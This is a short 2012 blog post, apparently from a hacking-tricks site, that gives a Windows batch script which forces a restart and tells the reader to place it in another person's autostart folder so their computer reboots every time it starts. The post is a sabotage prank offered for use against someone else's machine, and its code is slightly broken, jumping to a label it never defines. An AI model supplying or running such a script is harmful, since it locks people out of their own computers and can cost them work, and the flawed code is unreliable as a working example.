Related Posts Plugin for WordPress, Blogger...

Tuesday 24 April 2012

Make a computer shutdown everytime it boots

Paste the below code in notepad and save it as anything.bat

@echo off



cls
start shutdown -r

cls
goto :a

Then just put the file in autostart (which can be fond in the start menu)

So whenever the person starts up the computer, it is shutdown again.

0 comments:

Post a Comment

 
Zhacks